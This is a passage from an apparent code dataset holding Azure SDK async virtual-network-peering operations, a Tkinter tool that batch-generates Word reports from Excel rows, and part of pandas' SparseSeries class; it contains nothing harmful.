AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)\n elif polling is False: polling_method = AsyncNoPolling()\n else: polling_method = polling\n if cont_token:\n return AsyncLROPoller.from_continuation_token(\n polling_method=polling_method,\n continuation_token=cont_token,\n client=self._client,\n deserialization_callback=get_long_running_output\n )\n else:\n return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)\n begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'} # type: ignore\n\n async def get(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n virtual_network_peering_name: str,\n **kwargs\n ) -> \"models.VirtualNetworkPeering\":\n \"\"\"Gets the specified virtual network peering.\n\n :param resource_group_name: The name of the resource group.\n :type resource_group_name: str\n :param virtual_network_name: The name of the virtual network.\n :type virtual_network_name: 
str\n :param virtual_network_peering_name: The name of the virtual network peering.\n :type virtual_network_peering_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: VirtualNetworkPeering, or the result of cls(response)\n :rtype: ~azure.mgmt.network.v2020_03_01.models.VirtualNetworkPeering\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VirtualNetworkPeering\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n # Construct URL\n url = self.get.metadata['url'] # type: ignore\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'virtualNetworkName': self._serialize.url(\"virtual_network_name\", virtual_network_name, 'str'),\n 'virtualNetworkPeeringName': self._serialize.url(\"virtual_network_peering_name\", virtual_network_peering_name, 'str'),\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n deserialized = self._deserialize('VirtualNetworkPeering', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'} # type: ignore\n\n async def _create_or_update_initial(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n virtual_network_peering_name: str,\n virtual_network_peering_parameters: \"models.VirtualNetworkPeering\",\n **kwargs\n ) -> \"models.VirtualNetworkPeering\":\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VirtualNetworkPeering\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n content_type = kwargs.pop(\"content_type\", \"application/json\")\n accept = \"application/json\"\n\n # Construct URL\n url = self._create_or_update_initial.metadata['url'] # type: ignore\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'virtualNetworkName': self._serialize.url(\"virtual_network_name\", virtual_network_name, 'str'),\n 'virtualNetworkPeeringName': self._serialize.url(\"virtual_network_peering_name\", virtual_network_peering_name, 'str'),\n 'subscriptionId': 
self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Content-Type'] = self._serialize.header(\"content_type\", content_type, 'str')\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n body_content_kwargs = {} # type: Dict[str, Any]\n body_content = self._serialize.body(virtual_network_peering_parameters, 'VirtualNetworkPeering')\n body_content_kwargs['content'] = body_content\n request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200, 201]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n if response.status_code == 200:\n deserialized = self._deserialize('VirtualNetworkPeering', pipeline_response)\n\n if response.status_code == 201:\n deserialized = self._deserialize('VirtualNetworkPeering', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'} # type: ignore\n\n async def begin_create_or_update(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n virtual_network_peering_name: str,\n virtual_network_peering_parameters: \"models.VirtualNetworkPeering\",\n **kwargs\n ) -> AsyncLROPoller[\"models.VirtualNetworkPeering\"]:\n \"\"\"Creates or updates a peering in the specified virtual network.\n\n :param resource_group_name: The name of the resource group.\n :type resource_group_name: str\n :param virtual_network_name: The name of the virtual network.\n :type virtual_network_name: str\n :param virtual_network_peering_name: The name of the peering.\n :type virtual_network_peering_name: str\n :param virtual_network_peering_parameters: Parameters supplied to the create or update virtual\n network peering operation.\n :type virtual_network_peering_parameters: ~azure.mgmt.network.v2020_03_01.models.VirtualNetworkPeering\n :keyword callable cls: A custom type or function that will be passed the direct response\n :keyword str continuation_token: A continuation token to restart a poller from a saved state.\n :keyword polling: True for ARMPolling, False for no polling, or a\n polling object for personal polling strategy\n :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n :return: An instance of AsyncLROPoller that returns either VirtualNetworkPeering or the result of cls(response)\n :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_03_01.models.VirtualNetworkPeering]\n :raises ~azure.core.exceptions.HttpResponseError:\n \"\"\"\n polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]\n cls = kwargs.pop('cls', None) 
# type: ClsType[\"models.VirtualNetworkPeering\"]\n lro_delay = kwargs.pop(\n 'polling_interval',\n self._config.polling_interval\n )\n cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]\n if cont_token is None:\n raw_result = await self._create_or_update_initial(\n resource_group_name=resource_group_name,\n virtual_network_name=virtual_network_name,\n virtual_network_peering_name=virtual_network_peering_name,\n virtual_network_peering_parameters=virtual_network_peering_parameters,\n cls=lambda x,y,z: x,\n **kwargs\n )\n\n kwargs.pop('error_map', None)\n kwargs.pop('content_type', None)\n\n def get_long_running_output(pipeline_response):\n deserialized = self._deserialize('VirtualNetworkPeering', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n\n if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)\n elif polling is False: polling_method = AsyncNoPolling()\n else: polling_method = polling\n if cont_token:\n return AsyncLROPoller.from_continuation_token(\n polling_method=polling_method,\n continuation_token=cont_token,\n client=self._client,\n deserialization_callback=get_long_running_output\n )\n else:\n return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)\n begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'} # type: ignore\n\n def list(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n **kwargs\n ) -> AsyncIterable[\"models.VirtualNetworkPeeringListResult\"]:\n \"\"\"Gets all virtual network peerings in a virtual network.\n\n :param resource_group_name: The name of the resource group.\n :type resource_group_name: str\n :param virtual_network_name: The name of the virtual network.\n :type virtual_network_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: An iterator like instance of either VirtualNetworkPeeringListResult or the result of cls(response)\n :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_03_01.models.VirtualNetworkPeeringListResult]\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VirtualNetworkPeeringListResult\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n def prepare_request(next_link=None):\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n if not next_link:\n # Construct URL\n url = self.list.metadata['url'] # type: ignore\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'virtualNetworkName': self._serialize.url(\"virtual_network_name\", virtual_network_name, 'str'),\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", 
api_version, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n else:\n url = next_link\n query_parameters = {} # type: Dict[str, Any]\n request = self._client.get(url, query_parameters, header_parameters)\n return request\n\n async def extract_data(pipeline_response):\n deserialized = self._deserialize('VirtualNetworkPeeringListResult', pipeline_response)\n list_of_elem = deserialized.value\n if cls:\n list_of_elem = cls(list_of_elem)\n return deserialized.next_link or None, AsyncList(list_of_elem)\n\n async def get_next(next_link=None):\n request = prepare_request(next_link)\n\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n return pipeline_response\n\n return AsyncItemPaged(\n get_next, extract_data\n )\n list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings'} # type: ignore\n"} {"ext": "py", "sha": "1a2fc8d575d251990336801076d181ea0608fc89", "content": "from datetime import datetime\nfrom pathlib import Path\nfrom tkinter import *\nfrom tkinter import filedialog\n\nfrom docxtpl import DocxTemplate\nimport xlrd\nimport os\nimport configparser\nimport sys\n\n\ndef resource_path(relative_path):\n if getattr(sys, 'frozen', False):\n base_path = sys._MEIPASS\n else:\n base_path = os.path.dirname(os.path.abspath(__file__))\n print(os.path.join(base_path, relative_path))\n return os.path.join(base_path, relative_path)\n\n\ndef valid_count():\n config = configparser.ConfigParser()\n config.read(resource_path(os.path.join('res', 'conf.ini')), encoding=\"utf8\")\n return config.getint(\"sys_config\", \"totalCount\"), config.getint(\"sys_config\", \"usedCount\")\n\n\ndef update_valid(count):\n config = configparser.ConfigParser()\n config.read(resource_path(os.path.join('res', 'conf.ini')), encoding=\"utf8\")\n config.set(\"sys_config\", \"usedCount\", repr(count))\n config.write(open(resource_path(os.path.join('res', 'conf.ini')), \"w\"))\n\n\nclass Application(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master, bg='white')\n self.pack(expand=YES, fill=BOTH)\n self.window_init()\n self.createWidgets()\n\n def window_init(self):\n self.master.title('报告批处理系统')\n self.master.bg = 'white'\n width, height = self.master.maxsize()\n self.master.geometry(\"{}x{}\".format(500, 500))\n\n def createWidgets(self):\n # # fm1\n self.fm1 = Frame(self, bg='white')\n self.openButton = Button(self.fm1, text='选择表格文件', bg='#e4e4e5', fg='black', font=('微软雅黑', 12),\n command=self.fileOpen)\n self.openButton.pack(expand=YES)\n self.fm1.pack(side=TOP, pady=10, expand=NO, fill='x')\n\n # fm2\n self.fm2 = Frame(self, bg='white')\n self.predictEntry = Text(self.fm2, font=('微软雅黑', 10), fg='#FF4081', state=DISABLED)\n self.predictEntry.pack(side=LEFT, fill='y', padx=20, expand=YES)\n self.fm2.pack(side=TOP, expand=YES, fill=\"y\")\n\n def output_predict_sentence(self, r):\n # self.predictEntry.delete(0, END)\n self.predictEntry.config(state=NORMAL)\n self.predictEntry.insert(INSERT, r + \"\\n\")\n self.predictEntry.config(state=DISABLED)\n\n def fileOpen(self):\n fileName = filedialog.askopenfilename(title='选择表格文件', filetypes=[('Excel', '*.xlsx')])\n 
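# hand the selected .xlsx path to the report generator\n        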
self.read_excel(fileName)\n # self.output_predict_sentence(\"结束\")\n\n def read_excel(self, fileName):\n try:\n self.output_predict_sentence(\"选择文件为:\" + fileName)\n\n my_file = Path(fileName)\n if my_file.exists():\n pass\n else:\n self.output_predict_sentence(\"文件不存在,重新选择文件!\")\n\n my_dir_name = fileName.replace('.xlsx', '')\n my_dir = Path(my_dir_name)\n if my_dir.exists():\n pass\n else:\n os.makedirs(my_dir)\n # self.output_predict_sentence(\"创建存储目录\")\n\n # 打开excel\n x1 = xlrd.open_workbook(fileName)\n # 打开sheet1\n table = x1.sheet_by_index(0)\n nrows = table.nrows\n validCount = valid_count()\n\n if nrows - 2 + validCount[1] > validCount[0]:\n self.output_predict_sentence('数据异常,联系开发人员!')\n return\n\n self.output_predict_sentence('预计生成报告数:' + str(nrows - 2))\n self.output_predict_sentence(\"开始生成报告!\")\n\n for i in range(nrows - 2):\n reqTimeStr = str(table.cell_value(i + 2, 0)).strip()\n companyName = table.cell_value(i + 2, 1)\n if companyName is None:\n break\n productNumber = str(table.cell_value(i + 2, 2)).strip()\n SCCJ = str(table.cell_value(i + 2, 3)).strip()\n productName = str(table.cell_value(i + 2, 4)).strip()\n productTime = table.cell_value(i + 2, 5)\n PH = table.cell_value(i + 2, 6)\n LC = str(table.cell_value(i + 2, 7)).strip()\n GCZCH = table.cell_value(i + 2, 8)\n YJZH = table.cell_value(i + 2, 9)\n CYWZ = str(table.cell_value(i + 2, 10)).strip()\n GH = str(table.cell_value(i + 2, 11)).strip()\n reportTime = str(table.cell_value(i + 2, 12)).strip()\n # 日期转换\n reqTime = datetime.strptime(reqTimeStr, '%Y.%m.%d')\n reportTime = datetime.strptime(reportTime, '%Y.%m.%d')\n\n tpl = DocxTemplate(resource_path(os.path.join('res', 'tempdoc.docx')))\n context = {\n 'companyName': companyName,\n 'productNumber': productNumber,\n # 'SCCJ': SCCJ,\n # 'productName': productName,\n # 'productTime': productTime,\n # 'PH': PH,\n # 'LC': LC,\n # 'GCZCH': GCZCH,\n # 'YJZH': YJZH,\n 'CYWZ': CYWZ,\n 'GH': GH,\n 'reqTime': \"{0:%Y}.{0:%m}.{0:%d}\".format(reqTime),\n 'checkTime': \"{0:%Y}.{0:%m}.{0:%d}\".format(reqTime),\n 'reportTime': \"{0:%Y}.{0:%m}.{0:%d}\".format(reportTime),\n }\n\n if productName == 'None':\n context['productName'] = ''\n else:\n context['productName'] = productName\n\n if LC == 'None':\n context['LC'] = ''\n else:\n context['LC'] = LC\n\n if productTime is None:\n context['productTime'] = ''\n else:\n if isinstance(productTime, float):\n context['productTime'] = int(float(productTime))\n elif isinstance(productTime, int):\n context['productTime'] = int(productTime)\n else:\n context['productTime'] = str(\n productTime).replace('00:00:00+00:00', '')\n\n if PH is None:\n context['PH'] = ''\n else:\n if isinstance(PH, float):\n context['PH'] = int(float(PH))\n else:\n context['PH'] = PH\n\n if SCCJ == 'None':\n context['SCCJ'] = ''\n else:\n context['SCCJ'] = SCCJ\n\n if YJZH is None:\n context['YJZH'] = ''\n else:\n if isinstance(YJZH, float):\n context['YJZH'] = int(float(YJZH))\n else:\n context['YJZH'] = YJZH\n\n if GCZCH is None:\n context['GCZCH'] = ''\n else:\n if isinstance(GCZCH, float):\n context['GCZCH'] = int(float(GCZCH))\n else:\n context['GCZCH'] = GCZCH\n\n temp = str(i + 1)\n saveFileName = my_dir_name + '/' + \\\n companyName.replace('有限公司', '').strip() + '_' + \\\n GH + \"_\" + temp + '.docx'\n # self.output_predict_sentence(\"第\" + temp + \"文件:\" + saveFileName)\n tpl.render(context)\n tpl.save(saveFileName)\n\n update_valid(nrows - 2 + validCount[1])\n self.output_predict_sentence(\"报告生成结束,共生成报告:\" + repr(nrows - 2))\n\n except Exception as err:\n 
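# on failure, write the error to res/log_err.txt and surface it in the UI\n            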
blogpath = resource_path(os.path.join('res', 'log_err.txt'))\n f = open(blogpath, 'w+')\n f.writelines(repr(err))\n f.close()\n self.output_predict_sentence(\"报告生成失败,原因:\" + repr(err))\n\n\nif __name__ == '__main__':\n app = Application()\n app.mainloop()\n"} {"ext": "py", "sha": "1a2fc9698da2f9cf357773e84edacbb806889435", "content": "\"\"\"\nData structures for sparse float data. Life is made simpler by dealing only\nwith float64 data\n\"\"\"\n\n# pylint: disable=E1101,E1103,W0231\n\nfrom numpy import nan, ndarray\nimport numpy as np\nimport warnings\nimport operator\n\nfrom pandas.core.common import isnull, _values_from_object, _maybe_match_name\nfrom pandas.core.index import Index, _ensure_index\nfrom pandas.core.series import Series\nfrom pandas.core.frame import DataFrame\nfrom pandas.core.internals import SingleBlockManager\nfrom pandas.core import generic\nimport pandas.core.common as com\nimport pandas.core.ops as ops\nimport pandas.index as _index\n\nfrom pandas.sparse.array import (make_sparse, _sparse_array_op, SparseArray)\nfrom pandas._sparse import BlockIndex, IntIndex\nimport pandas._sparse as splib\n\nfrom pandas.sparse.scipy_sparse import (_sparse_series_to_coo,\n _coo_to_sparse_series)\n\n# -----------------------------------------------------------------------------\n# Wrapper function for Series arithmetic methods\n\n\ndef _arith_method(op, name, str_rep=None, default_axis=None, fill_zeros=None,\n **eval_kwargs):\n \"\"\"\n Wrapper function for Series arithmetic operations, to avoid\n code duplication.\n\n str_rep, default_axis, fill_zeros and eval_kwargs are not used, but are\n present for compatibility.\n \"\"\"\n\n def wrapper(self, other):\n if isinstance(other, Series):\n if not isinstance(other, SparseSeries):\n other = other.to_sparse(fill_value=self.fill_value)\n return _sparse_series_op(self, other, op, name)\n elif isinstance(other, DataFrame):\n return NotImplemented\n elif np.isscalar(other):\n if isnull(other) or isnull(self.fill_value):\n new_fill_value = np.nan\n else:\n new_fill_value = op(np.float64(self.fill_value),\n np.float64(other))\n\n return SparseSeries(op(self.sp_values, other),\n index=self.index,\n sparse_index=self.sp_index,\n fill_value=new_fill_value,\n name=self.name)\n else: # pragma: no cover\n raise TypeError('operation with %s not supported' % type(other))\n\n wrapper.__name__ = name\n if name.startswith(\"__\"):\n # strip special method names, e.g. `__add__` needs to be `add` when\n # passed to _sparse_series_op\n name = name[2:-2]\n return wrapper\n\n\ndef _sparse_series_op(left, right, op, name):\n left, right = left.align(right, join='outer', copy=False)\n new_index = left.index\n new_name = _maybe_match_name(left, right)\n\n result = _sparse_array_op(left, right, op, name)\n return SparseSeries(result, index=new_index, name=new_name)\n\n\nclass SparseSeries(Series):\n \"\"\"Data structure for labeled, sparse floating point data\n\n Parameters\n ----------\n data : {array-like, Series, SparseSeries, dict}\n kind : {'block', 'integer'}\n fill_value : float\n Defaults to NaN (code for missing)\n sparse_index : {BlockIndex, IntIndex}, optional\n Only if you have one. Mainly used internally\n\n Notes\n -----\n SparseSeries objects are immutable via the typical Python means. 
If you\n must change values, convert to dense, make your changes, then convert back\n to sparse\n \"\"\"\n _subtyp = 'sparse_series'\n\n def __init__(self, data=None, index=None, sparse_index=None, kind='block',\n fill_value=None, name=None, dtype=None, copy=False,\n fastpath=False):\n\n # we are called internally, so short-circuit\n if fastpath:\n\n # data is an ndarray, index is defined\n data = SingleBlockManager(data, index, fastpath=True)\n if copy:\n data = data.copy()\n else:\n\n if data is None:\n data = []\n\n if isinstance(data, Series) and name is None:\n name = data.name\n\n is_sparse_array = isinstance(data, SparseArray)\n if fill_value is None:\n if is_sparse_array:\n fill_value = data.fill_value\n else:\n fill_value = nan\n\n if is_sparse_array:\n if isinstance(data, SparseSeries) and index is None:\n index = data.index.view()\n elif index is not None:\n assert (len(index) == len(data))\n\n sparse_index = data.sp_index\n data = np.asarray(data)\n\n elif isinstance(data, SparseSeries):\n if index is None:\n index = data.index.view()\n\n # extract the SingleBlockManager\n data = data._data\n\n elif isinstance(data, (Series, dict)):\n if index is None:\n index = data.index.view()\n\n data = Series(data)\n data, sparse_index = make_sparse(data, kind=kind,\n fill_value=fill_value)\n\n elif isinstance(data, (tuple, list, np.ndarray)):\n # array-like\n if sparse_index is None:\n data, sparse_index = make_sparse(data, kind=kind,\n fill_value=fill_value)\n else:\n assert (len(data) == sparse_index.npoints)\n\n elif isinstance(data, SingleBlockManager):\n if dtype is not None:\n data = data.astype(dtype)\n if index is None:\n index = data.index.view()\n else:\n data = data.reindex(index, copy=False)\n\n else:\n\n length = len(index)\n\n if data == fill_value or (isnull(data) and isnull(fill_value)):\n if kind == 'block':\n sparse_index = BlockIndex(length, [], [])\n else:\n sparse_index = IntIndex(length, [])\n data = np.array([])\n\n else:\n if kind == 'block':\n locs, lens = ([0], [length]) if length else ([], [])\n sparse_index = BlockIndex(length, locs, lens)\n else:\n sparse_index = IntIndex(length, index)\n v = data\n data = np.empty(length)\n data.fill(v)\n\n if index is None:\n index = com._default_index(sparse_index.length)\n index = _ensure_index(index)\n\n # create/copy the manager\n if isinstance(data, SingleBlockManager):\n\n if copy:\n data = data.copy()\n else:\n\n # create a sparse array\n if not isinstance(data, SparseArray):\n data = SparseArray(data, sparse_index=sparse_index,\n fill_value=fill_value, dtype=dtype,\n copy=copy)\n\n data = SingleBlockManager(data, index)\n\n generic.NDFrame.__init__(self, data)\n\n self.index = index\n self.name = name\n\n @property\n def values(self):\n \"\"\" return the array \"\"\"\n return self.block.values\n\n def __array__(self, result=None):\n \"\"\" the array interface, return my values \"\"\"\n return self.block.values\n\n def get_values(self):\n \"\"\" same as values \"\"\"\n return self.block.to_dense().view()\n\n @property\n def block(self):\n return self._data._block\n\n @property\n def fill_value(self):\n return self.block.fill_value\n\n @fill_value.setter\n def fill_value(self, v):\n self.block.fill_value = v\n\n @property\n def sp_index(self):\n return self.block.sp_index\n\n @property\n def sp_values(self):\n return self.values.sp_values\n\n @property\n def npoints(self):\n return self.sp_index.npoints\n\n @classmethod\n def from_array(cls, arr, index=None, name=None, copy=False,\n fill_value=None, fastpath=False):\n 
\"\"\"\n Simplified alternate constructor\n \"\"\"\n return cls(arr, index=index, name=name, copy=copy,\n fill_value=fill_value, fastpath=fastpath)\n\n @property\n def _constructor(self):\n return SparseSeries\n\n @property\n def kind(self):\n if isinstance(self.sp_index, BlockIndex):\n return 'block'\n elif isinstance(self.sp_index, IntIndex):\n return 'integer'\n\n def as_sparse_array(self, kind=None, fill_value=None, copy=False):\n \"\"\" return my self as a sparse array, do not copy by default \"\"\"\n\n if fill_value is None:\n fill_value = self.fill_value\n if kind is None:\n kind = self.kind\n return SparseArray(self.values, sparse_index=self.sp_index,\n fill_value=fill_value, kind=kind, copy=copy)\n\n def __len__(self):\n return len(self.block)\n\n def __unicode__(self):\n # currently, unicode is same as repr...fixes infinite loop\n series_rep = Series.__unicode__(self)\n rep = '%s\\n%s' % (series_rep, repr(self.sp_index))\n return rep\n\n def __array_wrap__(self, result):\n \"\"\"\n Gets called prior to a ufunc (and after)\n \"\"\"\n return self._constructor(result, index=self.index,\n sparse_index=self.sp_index,\n fill_value=self.fill_value,\n copy=False).__finalize__(self)\n\n def __array_finalize__(self, obj):\n \"\"\"\n Gets called after any ufunc or other array operations, necessary\n to pass on the index.\n \"\"\"\n self.name = getattr(obj, 'name', None)\n self.fill_value = getattr(obj, 'fill_value', None)\n\n def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,\n filter_type=None, **kwds):\n \"\"\" perform a reduction operation \"\"\"\n return op(self.get_values(), skipna=skipna, **kwds)\n\n def __getstate__(self):\n # pickling\n return dict(_typ=self._typ, _subtyp=self._subtyp, _data=self._data,\n fill_value=self.fill_value, name=self.name)\n\n def _unpickle_series_compat(self, state):\n\n nd_state, own_state = state\n\n # recreate the ndarray\n data = np.empty(nd_state[1], dtype=nd_state[2])\n np.ndarray.__setstate__(data, nd_state)\n\n index, fill_value, sp_index = own_state[:3]\n name = None\n if len(own_state) > 3:\n name = own_state[3]\n\n # create a sparse array\n if not isinstance(data, SparseArray):\n data = SparseArray(data, sparse_index=sp_index,\n fill_value=fill_value, copy=False)\n\n # recreate\n data = SingleBlockManager(data, index, fastpath=True)\n generic.NDFrame.__init__(self, data)\n\n self._set_axis(0, index)\n self.name = name\n\n def __iter__(self):\n \"\"\" forward to the array \"\"\"\n return iter(self.values)\n\n def _set_subtyp(self, is_all_dates):\n if is_all_dates:\n object.__setattr__(self, '_subtyp', 'sparse_time_series')\n else:\n object.__setattr__(self, '_subtyp', 'sparse_series')\n\n def _get_val_at(self, loc):\n \"\"\" forward to the array \"\"\"\n return self.block.values._get_val_at(loc)\n\n def __getitem__(self, key):\n \"\"\"\n\n \"\"\"\n try:\n return self._get_val_at(self.index.get_loc(key))\n\n except KeyError:\n if isinstance(key, (int, np.integer)):\n return self._get_val_at(key)\n raise Exception('Requested index not in this series!')\n\n except TypeError:\n # Could not hash item, must be array-like?\n pass\n\n # is there a case where this would NOT be an ndarray?\n # need to find an example, I took out the case for now\n\n key = _values_from_object(key)\n dataSlice = self.values[key]\n new_index = Index(self.index.view(ndarray)[key])\n return self._constructor(dataSlice, index=new_index).__finalize__(self)\n\n def _set_with_engine(self, key, value):\n return self.set_value(key, value)\n\n def abs(self):\n 
\"\"\"\n Return an object with absolute value taken. Only applicable to objects\n that are all numeric\n\n Returns\n -------\n abs: type of caller\n \"\"\"\n res_sp_values = np.abs(self.sp_values)\n return self._constructor(res_sp_values, index=self.index,\n sparse_index=self.sp_index,\n fill_value=self.fill_value).__finalize__(self)\n\n def get(self, label, default=None):\n \"\"\"\n Returns value occupying requested label, default to specified\n missing value if not present. Analogous to dict.get\n\n Parameters\n ----------\n label : object\n Label value looking for\n default : object, optional\n Value to return if label not in index\n\n Returns\n -------\n y : scalar\n \"\"\"\n if label in self.index:\n loc = self.index.get_loc(label)\n return self._get_val_at(loc)\n else:\n return default\n\n def get_value(self, label, takeable=False):\n \"\"\"\n Retrieve single value at passed index label\n\n Parameters\n ----------\n index : label\n takeable : interpret the index as indexers, default False\n\n Returns\n -------\n value : scalar value\n \"\"\"\n loc = label if takeable is True else self.index.get_loc(label)\n return self._get_val_at(loc)\n\n def set_value(self, label, value, takeable=False):\n \"\"\"\n Quickly set single value at passed label. If label is not contained, a\n new object is created with the label placed at the end of the result\n index\n\n Parameters\n ----------\n label : object\n Partial indexing with MultiIndex not allowed\n value : object\n Scalar value\n takeable : interpret the index as indexers, default False\n\n Notes\n -----\n This method *always* returns a new object. It is not particularly\n efficient but is provided for API compatibility with Series\n\n Returns\n -------\n series : SparseSeries\n \"\"\"\n values = self.to_dense()\n\n # if the label doesn't exist, we will create a new object here\n # and possibily change the index\n new_values = values.set_value(label, value, takeable=takeable)\n if new_values is not None:\n values = new_values\n new_index = values.index\n values = SparseArray(values, fill_value=self.fill_value,\n kind=self.kind)\n self._data = SingleBlockManager(values, new_index)\n self._index = new_index\n\n def _set_values(self, key, value):\n\n # this might be inefficient as we have to recreate the sparse array\n # rather than setting individual elements, but have to convert\n # the passed slice/boolean that's in dense space into a sparse indexer\n # not sure how to do that!\n if isinstance(key, Series):\n key = key.values\n\n values = self.values.to_dense()\n values[key] = _index.convert_scalar(values, value)\n values = SparseArray(values, fill_value=self.fill_value,\n kind=self.kind)\n self._data = SingleBlockManager(values, self.index)\n\n def to_dense(self, sparse_only=False):\n \"\"\"\n Convert SparseSeries to (dense) Series\n \"\"\"\n if sparse_only:\n int_index = self.sp_index.to_int_index()\n index = self.index.take(int_index.indices)\n return Series(self.sp_values, index=index, name=self.name)\n else:\n return Series(self.values.to_dense(), index=self.index,\n name=self.name)\n\n @property\n def density(self):\n r = float(self.sp_index.npoints) / float(self.sp_index.length)\n return r\n\n def copy(self, deep=True):\n \"\"\"\n Make a copy of the SparseSeries. 
Only the actual sparse values need to\n be copied\n \"\"\"\n new_data = self._data\n if deep:\n new_data = self._data.copy()\n\n return self._constructor(new_data, sparse_index=self.sp_index,\n fill_value=self.fill_value).__finalize__(self)\n\n def reindex(self, index=None, method=None, copy=True, limit=None):\n \"\"\"\n Conform SparseSeries to new Index\n\n See Series.reindex docstring for general behavior\n\n Returns\n -------\n reindexed : SparseSeries\n \"\"\"\n new_index = _ensure_index(index)\n\n if self.index.equals(new_index):\n if copy:\n return self.copy()\n else:\n return self\n return self._constructor(self._data.reindex(new_index, method=method,\n limit=limit, copy=copy),\n index=new_index).__finalize__(self)\n\n def sparse_reindex(self, new_index):\n \"\"\"\n Conform sparse values to new SparseIndex\n\n Parameters\n ----------\n new_index : {BlockIndex, IntIndex}\n\n Returns\n -------\n reindexed : SparseSeries\n \"\"\"\n if not isinstance(new_index, splib.SparseIndex):\n raise TypeError('new index must be a SparseIndex')\n\n block = self.block.sparse_reindex(new_index)\n new_data = SingleBlockManager(block, self.index)\n return 